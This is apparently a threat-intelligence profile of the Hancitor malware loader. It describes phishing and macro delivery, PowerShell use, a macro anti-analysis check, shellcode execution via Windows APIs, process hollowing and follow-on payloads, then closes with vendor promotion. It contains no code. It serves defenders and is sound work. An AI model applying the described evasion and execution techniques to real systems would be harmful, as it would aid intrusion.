Hancitor
Hancitor, also known as Chanitor and Tordal, is a malware loader/dropper primarily distributed through malspam and phishing emails containing malicious attachments or links. Observed delivery chains include malicious Microsoft Word documents that prompt victims to enable macros, macro-based Excel attachments, and email links that redirect to ZIP archives containing VBS files. Hancitor has used PowerShell to execute commands, and its document macros have included an anti-analysis check that verifies the presence of an ActiveDocument shape object in the lure document before downloading additional payloads. It has also used the Windows APIs CallWindowProc and EnumResourceTypesA to interpret and execute shellcode.
Hancitor commonly serves as an initial-stage loader for follow-on malware. Reported secondary payloads include Pony, Evil Pony, Zeus Panda Banker, Ursnif, Cobalt Strike, Mars Stealer, and Ficker Stealer. One documented infection chain involved Hancitor dropping the final Ficker payload via process hollowing. Recent reporting also notes Hancitor infections pushing Mars Stealer EXE files as follow-up malware.
Operationally, Hancitor has been associated with phishing campaigns using DocuSign-themed lures, spoofed sender addresses, and malicious links. In one documented 2019 campaign, links redirected to a ZIP archive containing a VBS file, and the Hancitor DLL was stored in the victim Temp directory with a .txt extension. In that case, follow-on malware included Ursnif, and sandbox detonation also showed Cobalt Strike-related traffic. Persistence in the observed infection was attributed to Ursnif rather than Hancitor itself.
Hancitor has also been referenced in reporting on Nebulous Mantis / STORM-0978 / UNC2596 / Tropical Scorpius / Cuba activity, where the group reportedly used Hancitor since 2019 before pivoting to RomCom in mid-2022. Mandiant additionally reported overlaps between CHANITOR-related operations and COLDDRAW incidents, including shared infrastructure and tooling, though direct CHANITOR-to-COLDDRAW delivery was not observed.
High-confidence indicators and behaviors directly mentioned in the source content include phishing-email delivery, malicious Word and Excel macro documents, malicious links leading to ZIP/VBS payloads, PowerShell execution, macro-based anti-analysis via ActiveDocument shape-object checks, shellcode execution via CallWindowProc and EnumResourceTypesA, storage of a Hancitor DLL with a .txt extension in AppData\Local\Temp, and use as a loader for payloads such as Pony, Evil Pony, Ursnif, Cobalt Strike, Mars Stealer, and Ficker Stealer.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Initially relying on the Hancitor loader, the group pivoted in mid-2022 to RomCom..."
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesThe content repeatedly references phishing emails with embedded malicious links/URLs used to deliver malware or lure victims to malicious content (e.g., FIN7 broad phishing campaigns using malicious links; Emotet delivered by phishing emails containing links).
The content repeatedly describes threat actors and malware being delivered through phishing or spearphishing emails containing malicious attachments such as Microsoft Office documents, PDFs, RAR/ZIP archives, CHM, ISO, IMG, HTA, LNK, and executable files disguised as documents.
Multiple actors and malware families are described as being delivered via spearphishing/phishing emails containing malicious links (e.g., APT28 used URL shorteners to redirect to credential harvesting sites; APT29 used links to ZIP files; APT33 used links to .hta files; BlackTech used links to cloud services; Wizard Spider used links to Google Drive/free file hosting).
Execution
6 techniquesThe content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
The content repeatedly mentions malicious macros in Word/Excel documents, such as "enable macros," "embedded macros," and "macro-enabled documents."
The content repeatedly describes victims being lured into opening malicious attachments, enabling macros, launching installers, clicking embedded files/links, or otherwise directly executing malicious content.
"when opened..." and "Once the fake DocuSign document is opened and its malicious macro code is allowed to run"
Persistence
2 techniquesAcross the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
2 techniques"injects the final payload using a technique called process hollowing"
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Stealth
8 techniquesThe content repeatedly describes malware and threat actors using obfuscated code, encrypted strings, Base64/XOR/RC4/AES encoding, VMProtect/ConfuserEx/SmartAssembly, stack strings, control-flow flattening, opaque predicates, and hidden payloads to evade analysis and detection.
"injects the final payload using a technique called process hollowing"
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it. Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads. Operation Spalax threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.
Defense Impairment
1 techniqueDiscovery
2 techniquesCHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it. Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads. Operation Spalax threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.
Command and Control
2 techniquesIn 2017, nearly every 7th SBL listing that Spamhaus issued was for a botnet controller. The number of such botnet "C&C" listings increased by a massive 32% in 2017.
"install a Windows binary from an attacker-controlled server" and "receive a malicious URL containing a sample of Ficker to download"
Recent activity
27 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Loader used earlier in the intrusion chain prior to the group’s pivot to RomCom; used to deliver subsequent payloads.
Malware family used by the group since 2019 as part of their intrusion activity; the content does not provide additional functional detail beyond its use in targeting campaigns.
Malware loader used in earlier iterations of the campaign to deliver subsequent payloads.
Loader malware used to deliver other payloads, often used in campaigns to distribute ransomware and other threats.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.